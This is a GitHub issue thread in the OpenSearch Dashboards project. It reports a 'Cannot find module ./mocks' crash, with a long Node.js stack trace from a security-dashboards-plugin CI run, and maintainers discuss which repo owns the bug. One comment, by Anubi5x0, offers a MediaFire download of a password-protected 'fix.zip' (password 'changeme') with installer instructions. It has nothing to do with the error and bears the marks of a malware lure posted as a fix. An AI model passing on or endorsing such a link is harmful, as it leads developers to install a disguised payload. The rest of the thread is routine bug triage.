### ISSUE TITLE
[BUG] Discover binary issues

### ISSUE THREAD

**Issue by derek-ho** [opensearch-project/OpenSearch-Dashboards#7919]
**Describe the bug**

```
Error: Cannot find module './mocks'
Require stack:
- /home/runner/work/security-dashboards-plugin/security-dashboards-plugin/opensearch-dashboards-3.0.0-linux-x64/src/core/server/config/index.js
- /home/runner/work/security-dashboards-plugin/security-dashboards-plugin/opensearch-dashboards-3.0.0-linux-x64/src/core/server/plugins/discovery/plugin_manifest_parser.js
- /home/runner/work/security-dashboards-plugin/security-dashboards-plugin/opensearch-dashboards-3.0.0-linux-x64/src/core/server/plugins/discovery/index.js
- /home/runner/work/security-dashboards-plugin/security-dashboards-plugin/opensearch-dashboards-3.0.0-linux-x64/src/core/server/plugins/plugins_service.js
- /home/runner/work/security-dashboards-plugin/security-dashboards-plugin/opensearch-dashboards-3.0.0-linux-x64/src/core/server/plugins/index.js
- /home/runner/work/security-dashboards-plugin/security-dashboards-plugin/opensearch-dashboards-3.0.0-linux-x64/src/core/server/index.js
- /home/runner/work/security-dashboards-plugin/security-dashboards-plugin/opensearch-dashboards-3.0.0-linux-x64/src/cli/serve/serve.js
- /home/runner/work/security-dashboards-plugin/security-dashboards-plugin/opensearch-dashboards-3.0.0-linux-x64/src/cli/cli.js
- /home/runner/work/security-dashboards-plugin/security-dashboards-plugin/opensearch-dashboards-3.0.0-linux-x64/src/cli/dist.js
    at Function.Module._resolveFilename (node:internal/modules/cjs/loader:1134:15)
    at Module.Hook._require.Module.require (/home/runner/work/security-dashboards-plugin/security-dashboards-plugin/opensearch-dashboards-3.0.0-linux-x64/node_modules/require-in-the-middle/index.js:61:29)
    at require (node:internal/modules/helpers:[17](https://github.com/opensearch-project/security-dashboards-plugin/actions/runs/10617352631/job/29429956440?pr=2108#step:8:18)7:18)
    at Object.<anonymous> (/home/runner/work/security-dashboards-plugin/security-dashboards-plugin/opensearch-dashboards-3.0.0-linux-x64/src/core/server/config/index.js:156:14)
    at Module._compile (node:internal/modules/cjs/loader:1356:14)
    at Object.Module._extensions..js (node:internal/modules/cjs/loader:1414:10)
    at Module.load (node:internal/modules/cjs/loader:1[19](https://github.com/opensearch-project/security-dashboards-plugin/actions/runs/10617352631/job/29429956440?pr=2108#step:8:20)7:32)
    at Function.Module._load (node:internal/modules/cjs/loader:1013:12)
    at Module.require (node:internal/modules/cjs/loader:1225:19)
    at Module.Hook._require.Module.require (/home/runner/work/security-dashboards-plugin/security-dashboards-plugin/opensearch-dashboards-3.0.0-linux-x64/node_modules/require-in-the-middle/index.js:80:39)
```
**To Reproduce**

**Expected behavior**

**OpenSearch Version**
Please list the version of OpenSearch being used.

**Dashboards Version**
Please list the version of OpenSearch Dashboards being used.

**Plugins**

Please list all plugins currently enabled.

**Screenshots**

**Host/Environment (please complete the following information):**
 - Browser and version [e.g. 22]

**Additional context**

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by derek-ho** [comment]
@BionIT Can you help me find the correct owner for this?

**Comment by CCongWang** [comment]
looks like it failed due to `security-dashboards-plugin`, @opensearch-project/plugins could you please help transfer to the right repo?
